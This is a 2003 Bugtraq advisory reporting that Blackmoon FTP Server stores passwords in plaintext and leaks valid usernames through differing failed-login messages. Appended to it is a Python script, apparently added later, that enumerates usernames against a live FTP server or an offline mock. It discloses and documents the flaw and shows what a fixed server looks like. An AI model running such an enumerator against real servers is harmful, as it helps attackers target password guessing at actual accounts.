Message-ID: <006701c31f27$c001e0c0$0200a8c0@exce>
Date: Wed, 21 May 2003 01:30:07 +0200
From: Daniel Nyström <exce@...winder.nu>
To: <bugtraq@...urityfocus.com>
Subject: [[ TH 026 Inc. ]] SA #4 - Blackmoon FTP Server cleartext passwords and User enumeration


Telhack 026 Inc. Security Advisory - #4
_________________________________________

Name: Blackmoon FTP Server 2.6 Free Edition
Impact: Medium
Date: May 21 / 2003
_________________________________________

Daniel Nyström a.k.a. excE <exce@...winder.nu>



_I N F O_

BlackMoon FTP Server is an FTP daemon written specifically for Windows 2000/XP and above. It takes advantage of the new features in those OSes, such as I/O completion ports, thread pooling, running as a system service, using the built-in SSL certificate stores, authenticating against Active Directory or a remote NTLM domain, accessing network shares, impersonating an NT user and more. More at: www.blackmoonftpserver.com

The non-free editions have not been tested.



_P R O B L E M_

There are two problems with this software.

* User/password data is stored in plaintext.
* Usernames are easy to enumerate from the login error messages.



_I M P A C T_

Users with physical (or other local file) access to the server can copy the database and extract user/password pairs from it.
Malicious remote users can detect valid usernames on the FTP server, which turns a blind password-guessing attack into a targeted one.



_E X P L O I T I N G_

The plaintext Usernames/Passwords are stored in the file blackmoon.mdb in the 
Blackmoon FTP directory. To extract them use standard Windows software such 
as MS Access or MS Excel.

To find out which usernames are valid, just look at the server's reply to a failed login. The two failure cases produce different messages, and the valid-user case even echoes the supplied password back:

Valid username with invalid password: 
530-Login incorrect. Name[ValidUser] Pass[NotValidPass]

Invalid username with invalid password:
530-Account does not exist. Name[NotValidUser]

A tool for enumerating users in a bruteforce manner will be available on www.telhack.tk next week.
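The following script, an added example and not Blackmoon's code nor the tool announced above, turns the two replies quoted in this advisory into a username oracle. It first confirms the oracle is actually present by probing a made-up username; if the server answers every bad login the same way, enumeration yields nothing. The account set, the mock server behaviour and the second line of the multi-line 530 reply are constructed for offline testing and are assumptions; `socket_transact` is the real transport you would point at a live server (a fresh connection per attempt, like the advisory's manual test).

```python
"""Detect and exploit username-dependent 530 replies on an FTP server.

Added example, not Blackmoon's code. The two 530 texts come from the
advisory; the mock server, its account set and the terminating
"530 Login failed." line are constructed assumptions.
"""
import socket
from typing import Callable, List

# Constructed account set for the mock server; not real Blackmoon data.
MOCK_VALID_USERS = {"alice", "bob"}


def classify_530(first_line: str) -> str:
    """Say what a failed-login reply tells an attacker about the username.

    Keys on the two reply texts quoted in the advisory. Anything else,
    e.g. a uniform "530 Login incorrect.", is 'unknown': no leak.
    """
    if first_line.startswith("530") and "Account does not exist" in first_line:
        return "invalid_user"
    if first_line.startswith("530") and "Login incorrect. Name[" in first_line:
        return "valid_user"
    return "unknown"


def mock_transact(valid_users, hardened: bool) -> Callable[[str, str], List[str]]:
    """Offline stand-in for the USER/PASS exchange (constructed).

    Leaky mode reproduces the advisory's replies; hardened mode answers
    every failed login identically and never echoes the password.
    """
    def transact(user: str, password: str) -> List[str]:
        if hardened:
            return ["530 Login incorrect."]
        if user in valid_users:
            return [f"530-Login incorrect. Name[{user}] Pass[{password}]",
                    "530 Login failed."]  # second line is an assumption
        return [f"530-Account does not exist. Name[{user}]",
                "530 Login failed."]
    return transact


def socket_transact(host: str, port: int = 21, timeout: float = 5.0):
    """Real transport: one TCP connection per attempt, returns PASS reply lines."""
    def read_reply(f) -> List[str]:
        first = f.readline().decode("latin-1").rstrip("\r\n")
        lines = [first]
        if first[3:4] == "-":            # RFC 959 multi-line reply
            code = first[:3]
            while True:
                raw = f.readline()
                if not raw:
                    break
                line = raw.decode("latin-1").rstrip("\r\n")
                lines.append(line)
                if line.startswith(code + " "):   # "xyz " closes it
                    break
        return lines

    def transact(user: str, password: str) -> List[str]:
        with socket.create_connection((host, port), timeout=timeout) as s:
            f = s.makefile("rwb")
            read_reply(f)                                   # 220 banner
            f.write(f"USER {user}\r\n".encode()); f.flush()
            read_reply(f)                                   # 331 need password
            f.write(f"PASS {password}\r\n".encode()); f.flush()
            return read_reply(f)
    return transact


def enumerate_users(transact, candidates: List[str],
                    baseline: str = "zz-no-such-user-3k9q") -> List[str]:
    """Return the candidates the server reports as existing accounts.

    The baseline probe with a nonsense username must classify as
    'invalid_user'; otherwise the oracle is absent and nothing is returned.
    """
    if classify_530(transact(baseline, "x")[0]) != "invalid_user":
        return []
    return [u for u in candidates if classify_530(transact(u, "x")[0]) == "valid_user"]


if __name__ == "__main__":
    names = ["alice", "carol", "bob", "dave"]
    print("leaky   :", enumerate_users(mock_transact(MOCK_VALID_USERS, False), names))
    print("hardened:", enumerate_users(mock_transact(MOCK_VALID_USERS, True), names))
```

Against the leaky mock this reports alice and bob; against the hardened mock it reports nothing, which is the behaviour a fixed server should show: one reply text for every failed login, with no username or password echoed back.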


Daniel Nyström, excE
----------------------------------
exce@...winder.nu
http://www.telhack.tk
http://exce.ath.cx


